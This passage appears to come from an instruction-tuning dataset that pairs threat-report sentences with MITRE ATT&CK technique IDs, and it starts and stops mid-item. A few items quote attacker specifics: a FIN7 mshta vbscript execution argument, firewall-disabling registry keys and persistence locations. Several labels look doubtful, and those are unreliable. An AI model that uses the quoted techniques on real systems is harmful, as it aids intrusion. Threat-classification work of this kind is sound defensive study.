ID from MITRE ATT&CK framework.,Trap commands are of the following format trap 'command list' signals where ""command list"" will be executed when ""signals"" are received.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On execution, the tool injects itself into lsass.exe and is triggered with the argument “dig”### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya creates a task to reboot the system one hour after infection.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&&&”.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D can create a persistence file in the folder /Library/LaunchAgents.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is possible to start additional services after a safe mode boot.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples of cloud storage services include Dropbox and Google Docs.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can disable the firewall by modifying the registry key HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner used a batch script to run the Linux virtual machine as a service.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner has used QEMU and VirtualBox to run a Tiny Core Linux virtual machine, which runs XMRig and makes connections to the C2 server for updates.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many of this APT’s components are signed with phony Intel and AMD digital certificates### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Linux and macOS, these command histories can be accessed in a few different ways.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has utilized AutoIt and custom scripts to perform internal reconnaissance.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used macros, COM scriptlets, and VBS scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, the attacks different stages were hosted on a variety of free sites such as Mailimg, Github, Pastebin, dev-point.co, a.pomf.cat, and upload.cat### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe can achieve persistence by adding itself to the HKCU\Software\Microsoft\Windows\CurrentVersion\Run Registry key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can conduct brute force attacks to capture credentials.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used SQL injection for initial compromise.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The first shellcode decrypts a further shellcode block### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can take a screenshot on the infected system.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They have also dumped the LSASS process memory using the MiniDump function.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear can hook the ZwOpenProcess and GetExtendedTcpTable APIs called by the process of a security product to hide PIDs and TCP records from detection.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The version used here is version 4.1 digitally signed by Notepad++, as shown in Figure 5### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used scheduled tasks to stage its operation.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA uses cmd.exe to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has established e-mail accounts to receive e-mails forwarded from compromised accounts.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE uses WMI to perform discovery techniques.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The login shell executes scripts from the system and the user’s home directory to configure the environment.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The headers are XOR encrypted with and combined and reversed### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keydnap uses the keychaindump project to read securityd memory.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used scripts to download additional tools from compromised domains to victim systems.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can gather information from the Keepass password manager.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can use the command-line utility cacls.exe to change file permissions.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used exploit payloads that initiate download via FTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sowbug identified and extracted all Word documents on a server by using a command containing * .doc and *.docx.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has encoded PowerShell commands.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Server Message Block protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about identities may include a variety of details, including personal data as well as sensitive details such as credentials.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk can use multiple Windows API calls for actions on compromised hosts including discovery and execution.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill can take screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running ls -la ~/Library/Application\ Support/MobileSync/Backup/.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that can list out currently running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian has the ability to take screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has abused the Outlook Home Page feature for persistence.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The diagram in Figure 1 shows the samples, domains, IP addresses and e-mail addresses that we identified during our investigation (See Appendix B for more detail on these.) There is a clear split between Cluster A and Cluster B, with no infrastructure overlap between the two### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape has leveraged a vulnerability in Windows containers to perform an Escape to Host.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework., emond### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BOOSTWRITE has used a a 32-byte long multi-XOR key to decode data inside its payload.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor has used cmd.exe to run its self deletion routine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets or Social Media.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reflective code injection is very similar to Process Injection except that the “injection” loads code into the processes’ own memory instead of that of a separate process.### Assistant: T1620: Reflective Code Loading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evilnum has used the malware variant, TerraTV, to load a malicious DLL placed in the TeamViewer directory, instead of the original Windows DLL located in a system folder.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has used SMBTouch, a vulnerability scanner, to determine whether a target is vulnerable to EternalBlue malware.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence triggered by Ctrl-Alt-Delete.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used a VBScript to conduct reconnaissance on targeted systems.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee drops files with base64-encoded data.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can use wmic process call create in a scheduled task to launch plugins and for execution.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 , a program may be placed in the preceding directory that is named the same as a Windows program , which will be executed when that command is executed from a script or command-line.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT can execute PowerShell scripts loaded into memory or from the file system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents The malicious LNK launches “mshta.exe” with the following arguments passed to it: vbscript:Execute(""On Error Resume Next:set w=GetObject(,""""Word.Application""""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close"") The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection .### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volatile Cedar can inject web shell code into a server.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound used FireMalv, custom-developed malware, which collected passwords from the Firefox browser storage.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has used the API calls NtQuerySystemTime, GetSystemTimeAsFileTime, and GetTickCount to gather time metrics as part of its checks to see if the malware is running in a sandbox.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Carefully consider the risks before granting administrative rights to users on their own machines.Scrub and verify all administrator accounts regularly.Configure Group Policy to restrict all users to only one login session, where possible.Enforce secure network authentication, where possible.Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail.Segment networks into logical enclaves and restrict host-to-host communication paths### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There is usually a delay between when a vulnerability is discovered and when it is made public.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has used the NtQueryDirectoryFile and ZwQueryDirectoryFile functions to hide files and directories.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can modify Registry values within HKEY_CURRENT_USER\Software\Microsoft\Office\\Excel\Security\AccessVBOM\ to enable the execution of additional code.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may communicate using a protocol and port paring that are typically not associated.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell is injected into a shared SVCHOST process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has been executed through convincing victims into clicking malicious links.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MSBuild will compile and execute the inline task.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can collect directory and file lists.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volatile Cedar has targeted publicly facing web servers, with both automatic and manual vulnerability discovery.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST used DNS for C2 traffic designed to mimic normal SolarWinds API communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used malware disguised as Mozilla Firefox and a tool named mfevtpse.exe to proxy C2 communications, closely mimicking a legitimate McAfee file mfevtps.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT has been seen persisting via COM hijacking through replacement of the COM object for MruPidlList {42aedc87-2188-41fd-b9a3-0c966feabec1} or Microsoft WBEM New Event Subsystem {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} depending on the system's CPU architecture.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has delivered self-extracting 7z archive files within malicious document attachments, and used obfuscated or encrypted scripts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Then pastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different malware stages before achieving a full RAT implementation, which then communicates with the corresponding C2 server### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has collected a list of running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has deleted files on infected machines.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type network traffic can communicate over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command systeminfo.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows security identifier is a unique value that identifies a user or group account.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used valid credentials for privileged accounts with the goal of accessing domain controllers.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can clear and remove event logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These strings have the following format:uuid=[Victim ID]#un=[Username]#cn=[Hostname]#on=[OS Version]#lan=[IP Address]#nop=#ver=1.0uuid=[Victim ID]#un=[Username]#An example of the first string may be seen below:uuid=e29ac6c0-7037-11de-816d-806e6f6e696351c5#un=Josh Grunzweig#cn=WIN-LJLV2NKIOKP#on=mav6miv1#lan=192.168.217.141#nop=#ver=1.0It should be noted that the variables used for this string are different from previous versions### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke uses a keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework., capture video ### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The generated buffer is encoded using the BASE64 alphabet to be sent in the POST request### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Penquin C2 mechanism is based on TCP and UDP packets.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PE injection is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT30 may have used the SHIPSHAPE malware to move onto air-gapped networks.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KARAE was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework., template injeciton### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can drop its payload into the Startup directory to ensure it automatically runs when the compromised system is started.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Local Accounts may also be abused to elevate privileges and harvest credentials through OS Credential Dumping.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The QakBot payload has been disguised as a PNG file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus has used wmic.exe for local discovery information.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can execute GetLocalTime for time discovery.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The oldest known sample of the Delphi variant (SHA256: 5a02d4e5f6…) provided us a much stronger linkage between this Delphi Cannon and Cannon, as this sample collects system information and sends it to the C2 email address, which includes the path of the running process appended to the string Running place### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used stolen credentials to copy tools into the %TEMP% directory of domain controllers.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These user actions will typically be observed as follow-on behavior from forms of Phishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Authentication processes generally require a valid identity along with one or more authentication factors .### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or net view using Net.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly has performed forced authentication to gather hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE uses a Linear Feedback Shift Register algorithm for network encryption.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Catchamas creates three Registry keys to establish persistence by adding a Windows Service.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADCALL modifies the firewall Registry key SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileGloballyOpenPorts\\List.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal: Figure 28. Commands used for downloading and executing, and running a command in terminal Figure 29. Commands used in uploading and downloading file Figure 30### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae can use RC4 and XOR to encrypt C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As mentioned previously, Buckeye also uses a number of hacking tools, including the following: Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APIs and strings in some TYPEFRAME variants are RC4 encrypted.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe is capable of executing commands via cmd.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use exploits during various phases of the adversary lifecycle Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT gathers the time zone information from the victim’s machine.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cannon adds the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\handler\shell\action\command.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency channel.### Assistant: T1011: Exfiltration Over Other Network Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has a command to perform video device spying.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may take control of preexisting sessions with remote services to move laterally in an environment.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has used a variety of publicly-available remote access Trojans for its operations.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group replaced the background wallpaper of systems with a threatening image after rendering the system unbootable with a Disk Structure Wipe### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton gathers credentials in files for keychains.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAMMERTOSS is controlled via commands that are appended to image files.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 used a Trojan called KEYLIME to collect data from the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear has used RC4 encrypted shellcode.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi is capable of obtaining directory, file, and drive listings.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can detect commonly used and generic virtualization platforms based primarily on drivers and file paths.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Reaver as posted by Palo Alto, it gets the IP or domain of the C&C server, the port, name of the binary, a sleep timer, and what Palo Alto calls a “campaign identifier.” Technical Details At this moment, we were unable to retrieve the original infection vector and other information regarding what other tools the APT15 group is using to attack their targets### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 have enumerated files and directories, or searched in specific locations within a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro has infected victims via malicious attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBK has the ability to use cmd to run a Portable Executable on the compromised host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has used malicious JavaScript files for several components of their attack.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once executed, Vcrodat loads an encrypted payload on to the victim’s computer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commands such as net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET collects contacts and application data from files in Desktop, Documents, Downloads, Dropbox, and WeChat folders.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information from these scans may reveal opportunities for other forms of reconnaissance or Search Open Technical Databases, establishing operational resources or Obtain Capabilities, and/or initial access or Exploit Public-Facing Application.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK 